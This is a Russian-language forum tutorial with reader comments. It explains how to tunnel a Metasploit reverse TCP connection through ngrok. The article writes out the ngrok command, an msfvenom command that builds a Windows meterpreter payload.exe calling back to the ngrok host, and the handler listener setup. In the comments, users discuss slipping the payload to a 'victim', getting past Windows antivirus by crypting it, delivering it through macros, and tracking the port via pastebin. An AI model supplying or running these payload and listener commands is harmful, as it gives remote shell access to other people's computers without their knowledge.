• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья [Metasploit] устанавливаем обратное TCP соединение через ngrok

26924

Привет codeby.net!

Сегодня я вам покажу как можно получить обратное подключение без прокидывание портов и лишнего геморроя.
Для реализации обратного подключения нам понадобиться metasploit и ngrok.

Metasploit - проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.
Ngrok - это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис.

Для начало нам надо зарегистрировать аккаунт ngrok. Переходим на сайт , регистрируем аккаунт и выполняем первых три пункта.

24814
Подготовка выполнена, переходим к реализации задуманного.

Шаг 1 - Запускаем Ngrok
Запускаем ngrok: ./ngrok tcp 4444

24815
После запуска ngrok, вы увидете что то похожое на tcp://0.tcp.ngrok.io:13286 -> localhost:4444
Это означает что весь трафик который будет идти на 0.tcp.ngrok.io через порт 13286 будет перенаправляться к нам в машину на порт 4444. Не закрываем терминал и переходим к следующему шагу.

Шаг 2 - Создаем пользовательскую нагрузку
Запустим другой терминал и создадим пользовательскую нагрузку с вышеупомянутым хостом и портом.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13286 -f exe > payload.exe

24816
В данном примере создается пользовательская нагрузка windows, но вам никто не запрещает создать payloads под любую другую ОС используя тот же LHOST и LPORT.

Шаг 3 - Запускаем metasploit listener
Когда все настроено нам остается запустить слушатель. Сделать это можно выполнив приведенные команды ниже.
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
24817
После того как вы выполняете команду “exploit”, metasploit запустить слушатель на порт 4444 на вашей машине, который будет следить за любым входящим обратным TCP соединением.
На этом настройка закончена. После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.

24818
Доступ к атакуемой машине получен а значит мы добились поставленной задачи ;) На этом пожалуй все, надеюсь данный материал был полезен :)
 
Последнее редактирование:

id2746

Green Team
12.11.2016
435
644
BIT
14
Проверил на себе нагрузки:
android/meterpreter/reverse_tcp
android/meterpreter/reverse_http
Снимок экрана от 2019-01-10 14-10-26.png

всё работает как часы.
 
  • Нравится
Реакции: LTD и n3d.b0y

Pablo Garcia

Green Team
14.04.2018
20
8
BIT
0
После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
 

.Method

Grey Team
17.12.2018
255
63
BIT
0
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
Подсунуть.

Разумеется с согласия жертвы в рамках теста)
 
  • Нравится
Реакции: LTD и Pablo Garcia

n3d.b0y

Red Team
19.01.2018
181
472
BIT
75
только мало толку,одноразовая сессия
В корне с этим не согласен. Все зависит от того как это реализовать. Вот один пример из большого количество который можно привести. Если делать payload с восстановление сессии то можно залить порт на pastebin и перед подключением проверять его там. Когда порт измениться меняешь порт на pastebin и все сново работает.

p.s Все ограничивается вашей фантазией ;) Не нужна воспринимать все шаги как строгую инструкцию. Суть статьи показать как можно открыть порт)
 
Последнее редактирование:
  • Нравится
Реакции: Andrei Cenusa и MrBa

Pablo Garcia

Green Team
14.04.2018
20
8
BIT
0
попробовал. сталкнулся с очевидной проблемой( палевностью пейлоада). Через почту или файл обменник не дает отправить/залить. скинул нагрузку на флешку и руками закинул на таргет хост( вин10 бе ав) стандартные системы защиты винды сразу за визжали и определил нагрузку как троян. Залес в карантин выбрал нагрузку и разрешил ее активацию, сессия на мгновение запустилась и тут же упала. От сюда вопросы: как криптануть нагрузку и возможно ли доставка по средствам макросов или подобных методов?
 

parsif4l

New member
27.12.2018
4
0
BIT
0
у меня выдает ошибку при создании payload'а. Именно такого. Другие создаются спокойно
 
G

gashik4

у меня не приходит сессия через ngrok
 

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Откуда такая информация?
Читайте другие темы.) Во вчерашней теме вроде было сказано. (Про seeker)

Это же уже старый спсоб, у некоторых робит, у некоторых нет.) Год назад видел чисто такую же... Тему, только скрины были другие.)
 
L

luzercod

ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
 

Black_orchid

Green Team
30.10.2018
13
3
BIT
0
ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
Странно, гуглил все что можно, также искал на сайте ркн. В итоге не нашел абсолютно ничего связанного с блокировкой ngrok в РФ. Можете поделиться ссылкой на статью, новость или документ связанный с блокировкой?
 

narcoloki

Member
05.03.2019
20
0
BIT
0
Извиняюсь. Сегодня затестил ngrok- не цыпляется. borrow.io и serve.net вообще на сайт не заходит даже..... :(
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!